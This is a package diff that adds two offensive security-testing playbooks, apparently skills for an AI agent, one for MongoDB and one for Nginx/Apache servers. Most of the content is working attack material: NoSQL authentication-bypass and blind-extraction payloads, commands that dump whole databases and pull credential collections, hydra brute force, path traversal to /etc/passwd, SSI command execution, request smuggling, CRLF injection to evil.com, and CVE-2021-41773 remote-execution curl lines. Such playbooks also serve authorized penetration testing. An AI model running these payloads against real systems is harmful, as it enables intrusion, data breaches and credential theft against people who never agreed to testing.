@aegis-scan/skills 0.5.0 → 0.5.1

package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md

@@ -0,0 +1,257 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: mongodb
+description: Security testing playbook for MongoDB covering unauthenticated access, NoSQL injection, data extraction, and MongoDB-specific attack techniques
+---
+
+# MongoDB Security Testing
+
+MongoDB is frequently misconfigured with no authentication — exposing all databases publicly. Attack surface: no-auth by default (MongoDB < 3.0), NoSQL injection in web apps using Mongoose/MongoDB driver, unrestricted network binding, and operator injection.
+
+---
+
+## Reconnaissance
+
+### Discovery
+
+    # Port scanning
+    nmap -p 27017,27018,27019 <target> -sV --open
+
+    # Ports:
+    # 27017 — MongoDB default
+    # 27018 — MongoDB shard
+    # 27019 — MongoDB config server
+
+    # MongoDB banner check
+    nc <target> 27017
+    # Returns binary — use mongo client instead
+
+---
+
+## Unauthenticated Access
+
+    # Connect without credentials
+    mongosh <target>:27017
+    # Or: mongo --host <target> --port 27017
+
+    # Test auth requirement:
+    mongosh --host <target> --port 27017 --eval "db.adminCommand({listDatabases: 1})"
+    # If returns data without prompt → no authentication
+
+    # Using Python pymongo:
+    python3 -c "
+    import pymongo
+    c = pymongo.MongoClient('<target>', 27017, serverSelectionTimeoutMS=3000)
+    print(c.list_database_names())
+    "
+
+---
+
+## Enumeration
+
+    # List all databases
+    mongosh <target>:27017 --eval "db.adminCommand({listDatabases:1})"
+
+    # Switch to database and list collections
+    use admin
+    show collections
+
+    use <dbname>
+    show collections
+
+    # Count documents in a collection
+    db.<collection>.countDocuments({})
+
+    # Get first document (check structure)
+    db.<collection>.findOne()
+
+    # Get all documents
+    db.<collection>.find().toArray()
+
+    # Get all databases and collections in one shot:
+    mongosh --host <target> --eval "
+    var dbs = db.adminCommand({listDatabases:1}).databases;
+    dbs.forEach(function(d) {
+      var c = db.getSiblingDB(d.name);
+      var cols = c.getCollectionNames();
+      print(d.name + ': ' + cols.join(', '));
+    });
+    "
+
+---
+
+## Data Extraction
+
+    # Target high-value collections:
+    db.users.find()
+    db.accounts.find()
+    db.customers.find()
+    db.credentials.find()
+    db.sessions.find()
+    db.payments.find()
+
+    # Search for specific fields:
+    db.users.find({}, {username:1, email:1, password:1, role:1})
+
+    # Search for admin users:
+    db.users.find({role: "admin"})
+    db.users.find({is_admin: true})
+    db.users.find({$or: [{role:"admin"}, {role:"superuser"}]})
+
+    # Export entire collection to JSON:
+    mongoexport --host <target> --db <db> --collection <col> --out output/<col>.json
+
+    # Dump all databases:
+    mongodump --host <target> --out output/mongodump/
+
+---
+
+## NoSQL Injection
+
+### Boolean-based Operator Injection
+
+When user input reaches MongoDB query without sanitization:
+
+    # Login form — POST body JSON injection:
+    POST /api/login
+    Content-Type: application/json
+    {"username": "admin", "password": {"$gt": ""}}    # $gt matches any non-empty string
+
+    # $ne (not equal) bypass:
+    {"username": "admin", "password": {"$ne": "wrong"}}
+
+    # $in array bypass:
+    {"username": {"$in": ["admin", "root", "superuser"]}, "password": {"$gt": ""}}
+
+    # $regex — match any password starting with known prefix:
+    {"username": "admin", "password": {"$regex": "^pass"}}
+
+    # $where JavaScript injection (MongoDB < 4.4 or mapReduce enabled):
+    {"username": "admin", "$where": "sleep(5000)"}    # Time-based blind
+    {"$where": "function() { return this.username == 'admin' }"}
+
+### URL Parameter Injection
+
+    # Vulnerable: /api/users?username=admin
+    GET /api/users?username[$gt]=
+    GET /api/users?username[$ne]=wrong
+    GET /api/users?username[$regex]=admin.*
+
+    # Auth bypass:
+    GET /api/login?username[$gt]=&password[$gt]=
+
+### PHP Injection (Array Notation)
+
+    # PHP automatically parses [] as array:
+    POST /login
+    username[%24gt]=&password[%24gt]=
+
+### Enumeration via $regex (Blind)
+
+    # Extract admin password character by character:
+    {"username": "admin", "password": {"$regex": "^a"}}    # Starts with 'a'?
+    {"username": "admin", "password": {"$regex": "^ab"}}   # Starts with 'ab'?
+    # Binary search until full value extracted
+
+---
+
+## MongoDB Aggregation Pipeline Injection
+
+    # Injection via $lookup, $graphLookup stage parameters:
+    # Test: pipeline stage parameters that accept user input
+
+    # $function operator (MongoDB 4.4+) can run JavaScript:
+    db.users.aggregate([{
+      "$match": {
+        "$expr": {
+          "$function": {
+            "body": "function(name) { return true; }",
+            "args": ["$name"],
+            "lang": "js"
+          }
+        }
+      }
+    }])
+
+---
+
+## Authentication Brute Force
+
+    # Brute force MongoDB auth
+    hydra -l admin -P /usr/share/wordlists/rockyou.txt mongodb://<target>
+
+    # nmap mongodb-brute script:
+    nmap --script mongodb-brute <target> -p 27017
+
+    # Common MongoDB credentials:
+    # admin:admin, root:root, mongodb:mongodb, admin:(empty)
+
+---
+
+## MongoDB Configuration Analysis
+
+    # Get server configuration (if auth bypassed or no auth):
+    mongosh <target>:27017 --eval "db.adminCommand({getCmdLineOpts: 1})"
+    mongosh <target>:27017 --eval "db.adminCommand({serverStatus: 1})"
+
+    # Check if auth is enabled:
+    mongosh <target>:27017 --eval "db.adminCommand({getParameter: 1, authenticationMechanisms: 1})"
+
+    # Check replication / OpLog (for change detection):
+    mongosh <target>:27017 --eval "use local; db.oplog.rs.find().sort({$natural:-1}).limit(5)"
+
+---
+
+## MongoDB as SSRF Target
+
+    # Via SSRF to MongoDB (gopher or HTTP-based depending on proxy):
+    # MongoDB wire protocol — not HTTP, harder to exploit directly via HTTP SSRF
+    # But: if web app allows MongoDB URI configuration:
+    mongodb://attacker-server:27017/<db>    # Triggers outbound connection
+
+    # MongoDB URI injection:
+    # If connection string is user-controlled:
+    mongodb://localhost:27017/<db>@evil.com  # DNS rebinding
+    mongodb+srv://evil.com/<db>             # SRV record lookup to attacker
+
+---
+
+## MongoDB Atlas / Cloud
+
+    # Check for exposed MongoDB Atlas REST API:
+    GET https://cloud.mongodb.com/api/atlas/v1.0/
+
+    # Exposed connection strings in source code / git:
+    mongodb+srv://<user>:<pass>@cluster.mongodb.net/<db>
+    # Search: grep -r "mongodb+srv://" or "mongodb://" in repos
+
+---
+
+## Automated Scanning
+
+    # Nmap
+    nmap --script mongodb-info,mongodb-databases,mongodb-brute <target> -p 27017
+
+    # nuclei
+    nuclei -t exposures/databases/mongodb-unauth.yaml -u <target>:27017
+
+    # nosqlmap (NoSQL injection testing)
+    git clone https://github.com/codingo/NoSQLMap
+    python3 nosqlmap.py    # Interactive tool for NoSQL injection
+
+---
+
+## Pro Tips
+
+1. MongoDB default config binds to all interfaces (`0.0.0.0`) in older versions — check immediately
+2. `$gt: ""` injection is the most reliable auth bypass for MongoDB login forms
+3. `$where` JavaScript injection enables time-based blind extraction but requires JS enabled
+4. Always export with `mongoexport` after verifying access — faster than manual extraction
+5. OpLog (`local.oplog.rs`) contains recent database operations — may reveal credentials in plaintext
+6. Connection strings in git repos are the most common way to find MongoDB credentials
+7. Mongoose (Node.js ODM) does NOT sanitize operator injection by default — always test `$gt`/`$ne`
+
+## Summary
+
+MongoDB testing = unauthenticated access check + `listDatabases` + targeted collection dump + NoSQL injection in web forms. The `$gt: ""` operator injection bypasses authentication in most Mongoose-based Node.js apps. Unauthenticated MongoDB is a complete data breach — dump everything systematically with `mongoexport`. Always test `?field[$gt]=` in URL params and `{"field": {"$gt": ""}}` in JSON bodies.

package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md

@@ -0,0 +1,280 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: nginx-apache
+description: Security testing playbook for Nginx and Apache web servers covering misconfigurations, path traversal, alias bypass, server-side includes, and common CVEs
+---
+
+# Nginx / Apache Web Server Security Testing
+
+Web server misconfigurations are among the most common findings. Attack surface: directory listing, alias path traversal, open redirects, server-side includes, proxy header abuse, and known CVEs.
+
+---
+
+## Fingerprinting
+
+    # Server header
+    curl -I <target> | grep -i server
+    # Server: nginx/1.18.0
+    # Server: Apache/2.4.51 (Ubuntu)
+
+    # X-Powered-By header:
+    curl -I <target> | grep -i x-powered
+
+    # Verbose error pages:
+    GET /nonexistent → "404 Not Found nginx/1.18.0" (version disclosure)
+
+    # Apache mod_status (very commonly exposed):
+    GET /server-status                  # Full request log, worker status
+    GET /server-status?auto             # Machine-readable format
+
+    # Nginx status:
+    GET /nginx_status                   # Active connections, requests/s
+
+---
+
+## Directory Listing
+
+    # Apache: Options +Indexes enables listing
+    GET /uploads/
+    GET /backup/
+    GET /logs/
+    GET /files/
+    GET /images/
+    GET /css/
+    GET /static/
+    GET /assets/
+
+    # Check if directory listing is on:
+    curl -s <target>/uploads/ | grep -i "index of"
+
+    # Nuclei:
+    nuclei -t exposures/configs/apache-directory-listing.yaml -u <target>
+
+---
+
+## Apache Alias Traversal (Path Confusion)
+
+Critical: `/alias/` configuration path traversal:
+
+    # Vulnerable config:
+    # Alias /static /var/www/static
+    # (Note: no trailing slash on filesystem path)
+
+    # Exploit: add extra slash to escape alias root
+    GET /static../etc/passwd
+    GET /static..%2fetc%2fpasswd
+
+    # Vulnerable config 2:
+    # Alias /static/ /var/www/html/static
+    # ProxyPass /api/ http://backend:8080
+    # No trailing slash on ProxyPass:
+    GET /api../internal/config
+
+---
+
+## Nginx Alias Traversal (Path Confusion)
+
+Most common Nginx misconfiguration:
+
+    # Vulnerable Nginx config:
+    # location /static {
+    #     alias /var/www/app/static/;
+    # }
+    # (No trailing slash on location, has trailing slash on alias)
+
+    # Exploit: traverse out of static directory
+    GET /static../app/config.py
+    GET /static../etc/passwd
+    GET /static../app/.env
+
+    # Test with slash:
+    GET /static/../../etc/passwd     # If directory traversal not prevented
+    GET /static%2F..%2F..%2Fetc%2Fpasswd
+
+    # Safe config (both have trailing slash or both don't):
+    # location /static/ { alias /var/www/app/static/; }  ← Safe
+
+    # Automated test:
+    nuclei -t misconfiguration/nginx-alias-traversal.yaml -u <target>
+
+---
+
+## Nginx Off-By-Slash (SSRF/Proxy Bypass)
+
+    # Vulnerable Nginx proxy config:
+    # location /api {
+    #     proxy_pass http://backend/;
+    # }
+    # /api → http://backend//  (extra slash) — may bypass backend auth
+
+    GET /api../internal           # Traversal to other backend paths
+    GET /api/%2e%2e/internal
+
+---
+
+## Apache mod_status / mod_info Exposure
+
+    # Full server status (CRITICAL — reveals all active requests, IPs, URLs)
+    GET /server-status
+    GET /server-status?auto
+    GET /server-info           # mod_info: full Apache config dump
+
+    # What /server-status reveals:
+    # - All active HTTP requests (with parameters — may include auth tokens)
+    # - Client IP addresses
+    # - Worker states
+    # - Request rate/throughput
+
+---
+
+## Apache Server-Side Includes (SSI Injection)
+
+If the server parses SSI in user-controlled files:
+
+    # SSI directives (if .shtml files or SSI enabled for .html):
+    <!--#echo var="DATE_LOCAL"-->                    # Date disclosure
+    <!--#exec cmd="id"-->                            # RCE
+    <!--#include virtual="/etc/passwd"-->            # File read
+    <!--#printenv-->                                 # Dump environment
+
+    # Test: upload/inject SSI into any file that gets rendered server-side
+
+---
+
+## HTTP Request Smuggling (CWE-444)
+
+Nginx/Apache as reverse proxy — front/back disagreement on request boundary:
+
+    # CL.TE: Content-Length used by frontend, Transfer-Encoding by backend
+    POST / HTTP/1.1
+    Host: <target>
+    Content-Length: 13
+    Transfer-Encoding: chunked
+
+    0
+
+    SMUGGLED
+
+    # TE.CL: Transfer-Encoding used by frontend, Content-Length by backend
+    POST / HTTP/1.1
+    Host: <target>
+    Content-Length: 3
+    Transfer-Encoding: chunked
+
+    8
+    SMUGGLED
+    0
+
+    # Detect: use Burp Suite HTTP Request Smuggler extension
+    # Or: manual timing attack (send request, measure if next request is affected)
+
+---
+
+## Security Headers Analysis
+
+    # Check for missing security headers
+    curl -I <target> | grep -iE "strict-transport|x-frame|x-content-type|content-security|referrer|permissions|x-xss"
+
+    # Common misconfigs:
+    # Missing HSTS → SSL stripping
+    # Missing X-Frame-Options → clickjacking
+    # Missing CSP → XSS escalation
+    # Missing X-Content-Type-Options → MIME sniffing
+
+---
+
+## Nginx Miscellaneous Misconfigurations
+
+    # CRLF injection in redirect (old Nginx):
+    GET /%0d%0aLocation:%20http://evil.com
+
+    # Merge slashes off — allows bypassing path-based rules:
+    GET //admin/              # Nginx merges by default; some configs don't
+    GET ///admin///
+
+    # IPv6 literal bypass (some WAFs/rules don't handle):
+    GET http://[::1]/admin    # Loopback via IPv6
+
+    # $uri vs $request_uri in try_files (XSS via header injection):
+    # Vulnerable config: return 301 https://$host$uri;
+    # Payload: /%0d%0aSet-Cookie:+session=attacker
+
+---
+
+## Apache Miscellaneous Misconfigurations
+
+    # .htaccess parsing (if AllowOverride All):
+    # Upload .htaccess to change configuration
+    # Content: Options +Indexes or php_value auto_prepend_file /etc/passwd
+
+    # Apache Tomcat (Java) alongside Apache HTTP:
+    GET /manager/html           # Tomcat manager (common creds: tomcat:tomcat, admin:admin)
+    GET /manager/status
+    GET /host-manager/html
+
+    # Apache mod_proxy open relay:
+    GET http://evil.com/ HTTP/1.1
+    Host: <target>
+    # If proxy configured without ProxyRequests Off:
+    # Target becomes an HTTP proxy to the internet
+
+    # Options * method exposure:
+    OPTIONS / HTTP/1.1
+    Host: <target>
+    # Response: Allow: GET, POST, OPTIONS, TRACE, DELETE, PUT...
+    # TRACE enabled = XST (Cross-Site Tracing) attack possible
+
+---
+
+## Configuration File Exposure
+
+    # Apache config exposure:
+    GET /.htaccess                  # Apache per-directory config
+    GET /.htpasswd                  # Basic auth credentials
+    GET /web.config                 # IIS (if dual-server setup)
+
+    # Nginx common config paths (if PHP/CGI exposed):
+    GET /nginx.conf
+    GET /etc/nginx/nginx.conf
+
+    # Common backup configs:
+    GET /nginx.conf.bak
+    GET /nginx.conf.old
+    GET /httpd.conf.bak
+    GET /apache.conf.bak
+
+---
+
+## Common CVEs
+
+| CVE | Product | Impact |
+|-----|---------|--------|
+| CVE-2021-41773 | Apache 2.4.49 | Path traversal + RCE |
+| CVE-2021-42013 | Apache 2.4.49-50 | Path traversal (bypass of 41773 fix) |
+| CVE-2019-0211 | Apache | Local privilege escalation |
+| CVE-2017-7679 | Apache mod_mime | Buffer overflow |
+| CVE-2013-2028 | Nginx 1.3.9-1.4.0 | Stack buffer overflow |
+
+    # Test Apache path traversal CVE-2021-41773:
+    curl -s --path-as-is <target>/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
+    curl -s --path-as-is <target>/cgi-bin/.%2e/.%2e/bin/sh -d "echo;id"
+
+    # Nuclei:
+    nuclei -t cves/ -tags nginx,apache -u <target>
+
+---
+
+## Pro Tips
+
+1. Nginx alias traversal (location without trailing slash) is extremely common — test `/static../`
+2. `/server-status` exposes all active requests with parameters — goldmine for token theft
+3. `.htaccess` upload enables changing Apache config (PHP handlers, auth bypass, SSI)
+4. Apache CVE-2021-41773 (path traversal) is still unpatched on many production servers
+5. Nginx off-by-slash proxy configs allow reaching backend paths outside intended prefix
+6. HTTP request smuggling is highly effective behind Nginx/Apache reverse proxies
+7. `OPTIONS` method returning `TRACE` = Cross-Site Tracing (XST) — steal HttpOnly cookies
+
+## Summary
+
+Nginx/Apache testing = alias traversal (Nginx path confusion) + directory listing + server-status exposure + security header audit. The Nginx alias traversal `location /static { alias /path/; }` is the most impactful server-specific finding. Apache `/server-status` is almost always accessible and leaks active requests including auth tokens. Always check both servers if a reverse proxy setup is suspected.